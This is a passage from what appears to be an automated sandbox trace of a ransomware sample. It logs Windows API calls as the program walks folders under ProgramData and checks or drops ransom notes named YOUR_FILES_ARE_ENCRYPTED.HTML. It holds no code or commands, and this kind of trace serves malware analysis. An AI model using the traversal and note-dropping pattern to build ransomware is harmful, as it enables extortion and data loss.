lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb19b80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.862] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.862] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0169.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.862] GetProcessHeap () returned 0x270000 [0169.863] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.863] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ebda38, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 0 
[0169.863] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.863] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0169.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.864] GetProcessHeap () returned 0x270000 [0169.864] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.865] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbb19b80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.865] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0169.865] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.865] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbb19b80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, 
ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.865] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.865] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0169.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.868] GetProcessHeap () returned 0x270000 [0169.869] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.874] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb3fce0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="DeviceSync", cAlternateFileName="DEVICE~2")) returned 1 [0169.874] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync") returned 43 [0169.875] GetProcessHeap () returned 0x270000 [0169.875] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.876] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync" | out: 
lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync" [0169.876] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\*" [0169.876] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb3fce0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.877] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb3fce0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.877] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb3fce0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb3fce0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.877] 
wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.877] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.877] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb3fce0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb3fce0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.877] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.877] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\devicesync\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.877] GetProcessHeap () returned 0x270000 [0169.878] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.878] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, 
ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="DRM", cAlternateFileName="")) returned 1 [0169.878] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM") returned 36 [0169.878] GetProcessHeap () returned 0x270000 [0169.878] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.878] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM" [0169.878] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*" [0169.878] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.878] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.879] FindNextFileW (in: 
hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb3fce0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Server", cAlternateFileName="")) returned 1 [0169.879] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server") returned 43 [0169.879] GetProcessHeap () returned 0x270000 [0169.879] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.882] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server" [0169.882] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*" [0169.882] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb3fce0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.882] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x16, 
ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb3fce0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.883] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb3fce0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.883] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.883] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.883] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb3fce0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.883] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.884] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\DRM\\Server\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\drm\\server\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.884] GetProcessHeap () returned 0x270000 [0169.884] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.884] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbb65e40, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.884] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0169.885] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.885] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbb65e40, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) 
returned 0 [0169.885] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.885] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0169.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\drm\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.885] GetProcessHeap () returned 0x270000 [0169.885] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.886] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="eHome", cAlternateFileName="")) returned 1 [0169.886] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome") returned 38 [0169.886] GetProcessHeap () returned 0x270000 [0169.886] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.886] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome" [0169.886] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\*") 
returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\*" [0169.886] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.886] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.886] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="logs", cAlternateFileName="")) returned 1 [0169.886] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs") returned 43 [0169.886] GetProcessHeap () returned 0x270000 [0169.886] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.886] lstrcpyW (in: lpString1=0x73e0048, 
lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs" [0169.886] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\*" [0169.886] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.887] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.887] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbb65e40, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, 
